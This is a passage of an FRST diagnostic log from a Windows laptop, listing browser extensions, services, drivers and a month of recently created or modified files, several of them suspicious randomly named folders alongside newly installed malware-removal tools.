    CHR Extension: (Google Docs Offline) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-08]
    CHR Extension: (IDM Integration Module) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-09]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-08]
    CHR Extension: (Gmail) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-08]
    CHR Extension: (Chrome Media Router) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-08]
    CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]
    CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes)
    R3 FwLnk; C:\Windows\System32\drivers\FwLnk.sys [17920 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> TOSHIBA Corporation)
    S3 iaLPSSi_GPIO; C:\Windows\System32\drivers\iaLPSSi_GPIO.sys [38128 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
    S3 iaLPSSi_I2C; C:\Windows\System32\drivers\iaLPSSi_I2C.sys [122608 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
    R3 igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [10627744 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
    R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [198512 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
    S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2019-02-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
    R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [127136 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [72864 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [274416 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMWebProtection; C:\Windows\system32\DRIVERS\mwac.sys [114040 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
    R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-18] (Microsoft Windows -> Realtek )
    R3 RTL8187B; C:\Windows\System32\drivers\rtl8187B.sys [459336 2015-06-18] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation )
    R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45720 2019-02-08] (TOSHIBA CORPORATION -> Toshiba Corporation)
    U3 TrueSight; C:\Windows\System32\drivers\truesight.sys [28272 2019-02-09] (Adlice -> )
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
    S3 WDC_SAM; C:\Windows\System32\drivers\wdcsam64.sys [35584 2019-02-08] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
    S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One month (created) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-02-10 15:23 - 2019-02-10 15:23 - 000000000 ____D C:\Users\Thomazing!\Downloads\FRST-OlderVersion
    2019-02-10 15:20 - 2019-02-10 15:20 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_Thomazing!_HistoryPrediction.bin
    2019-02-09 13:22 - 2019-02-09 12:51 - 000875126 _____ C:\Windows\system32\PerfStringBackup.INI
    2019-02-09 13:21 - 2019-02-09 13:21 - 000002353 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
    2019-02-09 13:21 - 2019-02-09 13:21 - 000000000 ___RD C:\Users\Thomazing!\OneDrive
    2019-02-09 13:20 - 2019-02-09 13:20 - 000000000 ____D C:\Windows\CSC
    2019-02-09 13:19 - 2019-02-09 13:19 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_defaultuser0_HistoryPrediction.bin
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000020 ___SH C:\Users\Thomazing!\ntuser.ini
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Adobe
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\VirtualStore
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TileDataLayer
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Publishers
    2019-02-09 13:19 - 2019-02-08 22:22 - 000000000 ____D C:\Users\Thomazing!
    2019-02-09 13:19 - 2019-02-08 21:38 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Packages
    2019-02-09 13:15 - 2019-02-09 13:15 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
    2019-02-09 13:14 - 2019-02-08 23:05 - 000000000 ____D C:\Windows\Panther
    2019-02-09 12:55 - 2019-02-09 12:55 - 000000675 _____ C:\Users\Thomazing!\Desktop\malware trojan.txt
    2019-02-09 12:49 - 2019-02-09 12:49 - 000072864 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
    2019-02-09 12:46 - 2019-02-09 12:46 - 000274416 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
    2019-02-09 12:46 - 2019-02-09 12:46 - 000127136 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
    2019-02-09 12:46 - 2019-02-09 12:46 - 000114040 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
    2019-02-09 12:46 - 2019-02-09 12:46 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\PeerDistRepub
    2019-02-09 12:44 - 2019-02-09 12:44 - 000002783 _____ C:\Users\Thomazing!\Desktop\AdwCleaner[S00].txt
    2019-02-09 12:29 - 2019-02-09 12:46 - 000000000 ____D C:\AdwCleaner
    2019-02-09 12:29 - 2019-02-09 12:29 - 007316688 _____ (Malwarebytes) C:\Users\Thomazing!\Downloads\AdwCleaner.exe
    2019-02-09 12:29 - 2019-02-09 12:29 - 007316688 _____ (Malwarebytes) C:\Users\Thomazing!\Desktop\AdwCleaner.exe
    2019-02-09 12:27 - 2019-02-09 12:27 - 000036161 _____ C:\Users\Thomazing!\Desktop\malwarebytes.txt
    2019-02-09 12:06 - 2019-02-09 12:06 - 000198512 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
    2019-02-09 12:06 - 2019-02-09 12:06 - 000001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2019-02-09 12:06 - 2019-02-09 12:06 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\mbamtray
    2019-02-09 12:06 - 2019-02-09 12:06 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\mbam
    2019-02-09 12:06 - 2019-02-09 12:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2019-02-09 12:06 - 2019-02-01 11:20 - 000020936 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
    2019-02-09 12:06 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
    2019-02-09 12:05 - 2019-02-09 12:05 - 064476848 _____ (Malwarebytes ) C:\Users\Thomazing!\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9172 (1).exe
    2019-02-09 12:05 - 2019-02-09 12:05 - 064476848 _____ (Malwarebytes ) C:\Users\Thomazing!\Desktop\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9172 (1).exe
    2019-02-09 10:14 - 2019-02-09 10:14 - 000056671 _____ C:\Users\Thomazing!\Downloads\6971471.pdf
    2019-02-09 09:07 - 2019-02-09 09:07 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\NetworkTiles
    2019-02-09 08:20 - 2019-02-09 12:05 - 000000000 ____D C:\ProgramData\Malwarebytes
    2019-02-09 08:20 - 2019-02-09 12:05 - 000000000 ____D C:\Program Files\Malwarebytes
    2019-02-09 08:16 - 2019-02-09 08:19 - 064476848 _____ (Malwarebytes ) C:\Users\Thomazing!\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9172.exe
    2019-02-09 08:15 - 2019-02-09 08:15 - 000019920 _____ C:\Users\Thomazing!\Desktop\Delete report.txt
    2019-02-09 08:14 - 2019-02-09 08:14 - 000002354 _____ C:\Users\Thomazing!\Desktop\Report2.txt
    2019-02-09 08:14 - 2019-02-09 08:14 - 000002354 _____ C:\Users\Thomazing!\Desktop\Report1.txt
    2019-02-09 07:31 - 2019-02-09 07:31 - 000000899 _____ C:\Users\Public\Desktop\RogueKiller.lnk
    2019-02-09 07:30 - 2019-02-09 12:23 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\m1dfk02frcw
    2019-02-09 07:20 - 2019-02-09 07:32 - 000028272 _____ C:\Windows\system32\Drivers\truesight.sys
    2019-02-09 07:19 - 2019-02-09 07:19 - 000000000 ____D C:\ProgramData\RogueKiller
    2019-02-09 07:18 - 2019-02-09 07:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
    2019-02-09 07:18 - 2019-02-09 07:31 - 000000000 ____D C:\Program Files\RogueKiller
    2019-02-09 07:17 - 2019-02-09 07:17 - 029333240 _____ (Adlice Software ) C:\Users\Thomazing!\Desktop\RogueKiller_setup_ref3.exe
    2019-02-09 07:16 - 2019-02-09 07:17 - 029333240 _____ (Adlice Software ) C:\Users\Thomazing!\Downloads\RogueKiller_setup_ref3.exe
    2019-02-09 06:59 - 2019-02-09 07:48 - 000000000 ____D C:\Program Files\9AH8B0L5IJ
    2019-02-09 06:59 - 2019-02-09 07:04 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\dnrpypyqja1
    2019-02-09 01:03 - 2019-02-09 01:03 - 000023657 _____ C:\Users\Thomazing!\Downloads\Addition.txt
    2019-02-09 00:59 - 2019-02-10 15:25 - 000015224 _____ C:\Users\Thomazing!\Downloads\FRST.txt
    2019-02-09 00:59 - 2019-02-10 15:24 - 000000000 ____D C:\FRST
    2019-02-09 00:58 - 2019-02-10 15:23 - 002434048 _____ (Farbar) C:\Users\Thomazing!\Downloads\FRST64.exe
    2019-02-09 00:43 - 2019-02-09 12:23 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt
    2019-02-09 00:30 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\wlzey0ugdb2
    2019-02-08 23:57 - 2019-02-08 23:57 - 000000000 ____D C:\ProgramData\TechSmith
    2019-02-08 23:56 - 2019-02-08 23:58 - 000000000 ____D C:\Users\Thomazing!\Documents\Snagit
    2019-02-08 23:56 - 2019-02-08 23:56 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TechSmith
    2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Snagit12
    2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\Program Files (x86)\Snagit12
    2019-02-08 23:10 - 2019-02-08 23:10 - 000000000 ____D C:\ProgramData\SecuritySuite
    2019-02-08 23:02 - 2019-02-09 09:36 - 000004210 _____ C:\Windows\System32\Tasks\CCleaner Update
    2019-02-08 23:02 - 2019-02-09 00:30 - 000000000 ____D C:\Program Files\CCleaner
    2019-02-08 23:02 - 2019-02-08 23:02 - 000002898 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
    2019-02-08 23:02 - 2019-02-08 23:02 - 000002377 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2019-02-08 23:02 - 2019-02-08 23:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2019-02-08 23:01 - 2019-02-08 23:01 - 000000000 ____D C:\Program Files\Google
    2019-02-08 23:00 - 2019-02-08 23:07 - 000003418 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
    2019-02-08 23:00 - 2019-02-08 23:07 - 000003294 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
    2019-02-08 23:00 - 2019-02-08 23:01 - 000000000 ____D C:\ProgramData\Google
    2019-02-08 22:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\b2mkkcpioce
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\Reference Assemblies
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\MSBuild
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\MSBuild
    2019-02-08 22:55 - 2015-06-17 18:10 - 001166520 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll
    2019-02-08 22:55 - 2015-06-17 18:10 - 000124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
    2019-02-08 22:55 - 2015-06-17 18:10 - 000035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
    2019-02-08 22:55 - 2015-05-29 21:07 - 000778936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationNative_v0300.dll
    2019-02-08 22:55 - 2015-05-29 21:07 - 000102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
    2019-02-08 22:55 - 2015-05-29 21:07 - 000035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
    2019-02-08 22:46 - 2019-02-08 22:46 - 000000836 __RSH C:\ProgramData\ntuser.pol
    2019-02-08 22:28 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\fsmysd5hgd4
    2019-02-08 22:22 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\htpaossc1dy
    2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ C:\Users\Thomazing!\AppData\Local\dump007.dat
    2019-02-08 22:22 - 2019-02-08 22:22 - 000000009 _____ C:\Users\Thomazing!\rstr3.ini
    2019-02-08 22:11 - 2019-02-09 07:48 - 000000004 _____ C:\ProgramData\lock.dat
    2019-02-08 22:11 - 2019-02-09 07:30 - 000000036 _____ C:\ProgramData\irw.atsd
    2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ C:\ProgramData\ts.dat
    2019-02-08 22:08 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\dwdqael1vpm
    2019-02-08 22:03 - 2019-02-10 15:21 - 000004178 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{166847B2-00F9-4170-B86A-AB179FF4BAF1}
    2019-02-08 22:03 - 2019-02-08 22:03 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Macromedia
    2019-02-08 22:00 - 2019-02-08 22:00 - 000003584 _____ C:\Windows\SECOH-QAD.dll
    2019-02-08 21:58 - 2019-02-09 10:34 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\DMCache
    2019-02-08 21:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\p542dcem2lr
    2019-02-08 21:58 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\IDM
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Video
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Compressed
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\IDM
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Program Files (x86)\Internet Download Manager
    2019-02-08 21:50 - 2019-02-08 21:50 - 001612288 _____ C:\Windows\bxetfbicyncsflqei.bxetf
    2019-02-08 21:49 - 2019-02-08 23:06 - 000000000 ____D C:\ProgramData\boost_interprocess
    2019-02-08 21:49 - 2019-02-08 21:52 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Opera Software
    2019-02-08 21:48 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\la5jchefohd
    2019-02-08 21:47 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\znnxx0e21dn
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ C:\Users\Thomazing!\AppData\Local\wbem.ini
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Mozilla
    2019-02-08 21:46 - 2019-02-09 00:39 - 000000000 ____D C:\Program Files (x86)\Cta
    2019-02-08 21:46 - 2019-02-08 21:48 - 008019296 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
    2019-02-08 21:46 - 2019-02-08 21:48 - 001123400 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
    2019-02-08 21:46 - 2019-02-08 21:46 - 000621928 _____ (VxDriver) C:\Windows\B62CD2D3FFB1.sys
    2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Opera Software
    2019-02-08 21:45 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\uTorrent
    2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ C:\Users\Thomazing!\AppData\Local\installer.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000053888 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\TVALZ_O.SYS
    2019-02-08 21:45 - 2019-02-08 21:45 - 000045720 _____ (Toshiba Corporation) C:\Windows\system32\Drivers\Thotkey.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000044208 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\tosrfec.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000035584 _____ (Western Digital Technologies, Inc.) C:\Windows\system32\Drivers\wdcsam64.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000017920 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\FwLnk.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000003088 _____ C:\Windows\System32\Tasks\Synaptics TouchPad Enhancements
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000881 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\猥orrent.lnk
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Synaptics
    2019-02-08 21:44 - 2019-02-08 21:45 - 000000000 ____D C:\ProgramData\VMR6PC5JA6GYC9V0XH3B
    2019-02-08 21:44 - 2019-02-08 21:44 - 001795952 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01011.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000722672 _____ (Synaptics Incorporated) C:\Windows\system32\SynCOM.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000528112 _____ (Synaptics Incorporated) C:\Windows\system32\Drivers\SynTP.sys
    2019-02-08 21:44 - 2019-02-08 21:44 - 000422128 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPCo19.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000400112 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynCom.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000251632 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPAPI.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000169712 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynTPCom.dll
    2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\WinRAR
    2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
    2019-02-08 21:41 - 2019-02-08 21:41 - 003141232 _____ (Alexander Roshal) C:\Users\Thomazing!\Downloads\winrar-x64-57b1.exe
    2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\WinRAR
    2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\VideoLAN
    2019-02-08 21:37 - 2019-02-08 21:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
    2019-02-08 21:35 - 2019-02-08 21:35 - 010627744 _____ (Intel Corporation) C:\Windows\system32\Drivers\igdkmd64.sys
    2019-02-08 21:35 - 2019-02-08 21:35 - 006593816 _____ (Intel Corporation) C:\Windows\system32\igdumd64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004931384 _____ (Intel Corporation) C:\Windows\SysWOW64\igdumd32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004755784 _____ (Intel Corporation) C:\Windows\system32\igd10umd64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004370016 _____ (Intel Corporation) C:\Windows\SysWOW64\igd10umd32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 001991936 _____ C:\Windows\system32\iglhxa64.cpa
    2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\SysWOW64\igkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\system32\igkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\SysWOW64\igcompkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\system32\igcompkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000208896 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhsip32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000206336 _____ (Intel Corporation) C:\Windows\system32\iglhsip64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000188416 _____ (Intel Corporation) C:\Windows\system32\iglhcp64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000147456 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhcp32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\SysWOW64\igfcg500m.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\system32\igfcg500m.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060254 _____ C:\Windows\system32\iglhxg64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060226 _____ C:\Windows\system32\iglhxc64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060015 _____ C:\Windows\system32\iglhxo64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000005424 _____ C:\Windows\system32\iglhxs64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000001090 _____ C:\Windows\system32\iglhxa64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000000000 ____D C:\Windows\PCHEALTH
    2019-02-08 21:34 - 2019-02-08 21:34 - 000000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
    2019-02-08 21:33 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Microsoft Office
    2019-02-08 21:33 - 2019-02-08 21:35 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 __RHD C:\MSOCache
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Microsoft Help
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Program Files (x86)\Microsoft Analysis Services
    2019-02-08 21:26 - 2019-02-08 23:17 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Google
    2019-02-08 21:26 - 2019-02-08 23:02 - 000000000 ____D C:\Program Files (x86)\Google
    2019-02-08 21:26 - 2019-02-08 21:26 - 001136176 _____ (Google Inc.) C:\Users\Thomazing!\Downloads\ChromeSetup.exe
    2019-02-08 21:24 - 2019-02-08 21:24 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\MicrosoftEdge
    2019-02-07 17:10 - 2019-02-07 17:10 - 000098203 _____ C:\Windows\uninstaller.dat

    ==================== One month (modified) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-02-09 13:19 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\rescache
    2019-02-09 13:16 - 2015-07-10 17:47 - 000000000 ____D C:\Windows\system32\Sysprep
    2019-02-09 13:14 - 2015-07-31 06:42 - 000028672 _____ C:\Windows\system32\config\BCD-Template
    2019-02-09 12:51 - 2015-07-31 06:40 - 000000000 ____D C:\Windows\INF
    2019-02-09 12:46 - 2015-07-31 05:52 - 000000006 ____H C:\Windows\Tasks\SA.DAT
    2019-02-09 12:46 - 2015-07-10 17:05 - 000131072 ___SH C:\Windows\system32\config\BBI
    2019-02-09 12:06 - 2015-07-31 06:42 - 000000000 ___HD C:\Windows\ELAMBKUP
    2019-02-09 07:01 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\appcompat
    2019-02-08 23:59 - 2015-09-10 13:44 - 000000000 __RHD C:\Users\Public\AccountPictures
    2019-02-08 22:56 - 2015-07-31 06:25 - 000000000 ____D C:\Windows\CbsTemp
    2019-02-08 22:45 - 2015-07-31 06:42 - 000000000 ___HD C:\Windows\system32\GroupPolicy
    2019-02-08 22:08 - 2015-07-31 05:49 - 000277768 _____ C:\Windows\system32\FNTCACHE.DAT
    2019-02-08 21:46 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\AppReadiness
    2019-02-08 21:39 - 2015-07-31 06:42 - 000000000 ___HD C:\Program Files\WindowsApps
    2019-02-08 21:34 - 2015-07-31 06:42 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
    2019-02-08 21:33 - 2015-09-10 13:21 - 000000000 ____D C:\Windows\ShellNew

    ==================== Files in the root of some directories =======

    2019-02-08 22:11 - 2019-02-09 07:48 - 000000004 _____ () C:\ProgramData\lock.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ () C:\ProgramData\ts.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
